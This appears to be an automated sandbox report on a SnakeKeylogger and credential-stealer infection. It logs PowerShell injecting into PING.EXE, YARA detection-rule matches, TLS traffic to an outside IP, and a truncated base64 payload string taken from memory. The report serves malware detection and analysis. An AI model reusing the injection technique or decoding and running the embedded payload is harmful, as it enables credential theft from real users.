                Source: PING.EXE, 00000008.00000003.1393293221.0000000005609000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1396518926.00000000055A3000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.0000000005635000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000003.1393293221.00000000055CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: PING.EXE, 00000008.00000002.3328916486.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: PING.EXE, 00000008.00000002.3328916486.00000000045A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                Source: unknownNetwork traffic detected: HTTP traffic on port 58073 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58059 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58075 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58070 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58059
                Source: unknownNetwork traffic detected: HTTP traffic on port 58067 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58075
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58067
                Source: unknownNetwork traffic detected: HTTP traffic on port 58061 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58061
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58063
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58073
                Source: unknownNetwork traffic detected: HTTP traffic on port 58063 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58070
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:58075 version: TLS 1.2

                System Summary

                barindex
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000008.00000002.3327175771.0000000000770000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.991277571.000001BEBEC8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.csLong String: Length: 48464
                Source: 2.2.powershell.exe.1bed4be0000.1.raw.unpack, cdXfw.csLong String: Length: 48464
                Source: ilgwppf0.dll.9.dr, cdXfw.csLong String: Length: 48464
                Source: C:\Windows\SysWOW64\PING.EXEProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF936876F3D NtCreateThreadEx,2_2_00007FF936876F3D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF936876E11 NtWriteVirtualMemory,2_2_00007FF936876E11
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF936943E902_2_00007FF936943E90
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF936941ADC2_2_00007FF936941ADC
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_00777A748_2_00777A74
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_0077521C8_2_0077521C
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_007730808_2_00773080
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_00773F748_2_00773F74
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_0077477C8_2_0077477C
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_007743448_2_00774344
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DC6708_2_068DC670
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DE5F08_2_068DE5F0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D53A78_2_068D53A7
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DC3A28_2_068DC3A2
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DC0D28_2_068DC0D2
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DCEE08_2_068DCEE0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DCC108_2_068DCC10
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DBC388_2_068DBC38
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DC9428_2_068DC942
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DF5DC8_2_068DF5DC
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DE5E08_2_068DE5E0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D42688_2_068D4268
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DA0F88_2_068DA0F8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D70388_2_068D7038
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D2E548_2_068D2E54
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068D6A008_2_068D6A00
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_068DFA208_2_068DFA20
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F48B588_2_06F48B58
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F477208_2_06F47720
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F47D788_2_06F47D78
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4F9588_2_06F4F958
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F422F18_2_06F422F1
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4A6E88_2_06F4A6E8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F44ED08_2_06F44ED0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4A6D88_2_06F4A6D8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F472C88_2_06F472C8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F472CA8_2_06F472CA
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4E2A08_2_06F4E2A0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F41EA88_2_06F41EA8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4E2918_2_06F4E291
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F41E988_2_06F41E98
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F46E708_2_06F46E70
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F44A738_2_06F44A73
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F44A788_2_06F44A78
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4C2788_2_06F4C278
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F46E608_2_06F46E60
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4C2698_2_06F4C269
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F41A508_2_06F41A50
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4A2508_2_06F4A250
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F41A408_2_06F41A40
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4A2418_2_06F4A241
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F446208_2_06F44620
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F446228_2_06F44622
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F46A188_2_06F46A18
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4DE088_2_06F4DE08
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F46A098_2_06F46A09
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F48FF08_2_06F48FF0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F48FE08_2_06F48FE0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4EBD08_2_06F4EBD0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F45BD88_2_06F45BD8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4EBC18_2_06F4EBC1
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F45BCB8_2_06F45BCB
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F42BB08_2_06F42BB0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F42BA38_2_06F42BA3
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4CBA88_2_06F4CBA8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4CB998_2_06F4CB99
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F457808_2_06F45780
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4AB808_2_06F4AB80
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F457828_2_06F45782
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4AB718_2_06F4AB71
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F427588_2_06F42758
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F427488_2_06F42748
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F48B498_2_06F48B49
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4E7388_2_06F4E738
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F453288_2_06F45328
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4E7288_2_06F4E728
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4C7108_2_06F4C710
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F477118_2_06F47711
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F453188_2_06F45318
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F423008_2_06F42300
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4C7018_2_06F4C701
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F408F08_2_06F408F0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4F4F18_2_06F4F4F1
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F408E18_2_06F408E1
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4D4D88_2_06F4D4D8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4D4C88_2_06F4D4C8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4B4B08_2_06F4B4B0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4B4A08_2_06F4B4A0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F404988_2_06F40498
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F494888_2_06F49488
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F404888_2_06F40488
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F494788_2_06F49478
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F434608_2_06F43460
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4F0688_2_06F4F068
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4F0588_2_06F4F058
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F400408_2_06F40040
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4D0408_2_06F4D040
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F460308_2_06F46030
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4D0308_2_06F4D030
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F460208_2_06F46020
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4B0188_2_06F4B018
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F400078_2_06F40007
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F430078_2_06F43007
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F430088_2_06F43008
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4B0088_2_06F4B008
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F415F88_2_06F415F8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4DDF98_2_06F4DDF9
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4BDE08_2_06F4BDE0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4BDD18_2_06F4BDD1
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F465C08_2_06F465C0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F441C88_2_06F441C8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F49DB88_2_06F49DB8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F441B88_2_06F441B8
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F465BB8_2_06F465BB
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F411A08_2_06F411A0
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F49DA98_2_06F49DA9
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4D9708_2_06F4D970
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4D9618_2_06F4D961
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F40D488_2_06F40D48
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4B9488_2_06F4B948
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4F9488_2_06F4F948
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F40D388_2_06F40D38
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4B9388_2_06F4B938
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F499208_2_06F49920
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F499108_2_06F49910
                Source: C:\Windows\SysWOW64\PING.EXECode function: 8_2_06F4F5008_2_06F4F500
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.PING.EXE.6900000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.3327175771.0000000000770000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000008.00000002.3332252610.0000000006900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.991277571.000001BEBEC8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: Process Memory Space: PING.EXE PID: 3612, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.powershell.exe.1beccf163d0.0.raw.unpack, cdXfw.csBase64 encoded string: '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
                Source: 2.2.powershell.exe.1bed4be0000.1.raw.unpack, cdXfw.csBase64 encoded string: 'oxhATWMkXGtNUXMepgQXZcHgj9yeWHk4EtJIJbd6xvgvjNXqP2IVuLt3a01jbg20GCV2RUxGoEF2iAQfqN0hksUhiVikk09ChziOf9nfXTOe7sEKn363b6Pd2No9HTUY5kWM+R8JtzPzKv9EGqWDWyBUfvFSMva6DKlQyEn9yWhDplh8xUVX1A79mebKHau8QVnUN+BdIVuVpqTZCP/vuM3gJkXsGSmi7RHeMnudRHIxogRvYtus+ncRkLhQpF16oVcxzfJ68L6VyQfQXDpVL655WUPlyAKRBeHhCbaZ5em1kyqBGColH7tvWTlGTYkk1DQpgD0uJYdmh2g0A3MULhpZM/R173bnMfSy8mlubBtcHGqcliWO7w3vqAIlA7XIPh4/wzwGS3zF4l47X//ezyIL9bSRtp5KDFK4IFQI5tzKaoqDeFj4TXZnmQgl5qZVEf3sKrHWtXk7UW5rWdgNeg8irLTMj0lONIsRcY0/WJ3bHLHA5KhwrvfYbPXFmiExyOlw4uiPYtGHZ7YbTYpf/O8VKMp5Kk3xkmrVChrGyvh3VQGDrlqb6hx5eDb0lAPbD9SxwktyX55+NLCLvVXl32xis75/SbA03DHd9QbqIJCghSxy70CvYzCSTyss4VU1qDo8II99mi15N+aasJoBc4bB2K13ofk7hC40XuMO219x5qg/M0dNSyt2vLeUZSOwMgx/GfGlMunCdBs7sz4ORwhqIg+EYS3J68PZIbprTWNLd2tNY0p3a01gS3drTWNLd2TSvaX9UIuSCkc/MLm0aoOVQI8Dx/gIVkkm6XEdslveNLWsKlKebMiVtiHuGc+h/Jz4D16WkMzXCRNZD5xpltdVs8bfug6QtPwCD1o0HJVrSQk83naamp9Q/vtsgy9t4wvMPW7a0RRT+MrLFzrvBVY3coOdtG9IhCjd2sE41JqUJrkeZF/T/sjYlIVYKvUfyXIkYNrjYh6M4ggNOXnXKnQKz84A2FbRXpKzDggiDqA9i3V4vjQME2SSTD1U4xSSHyt74OkNl6JkhJzOHCtx+++DnxRcNmT5yNBJXQgRMicgagOtbnXkBY5IMT1gmKVzGyx8zy9fl1j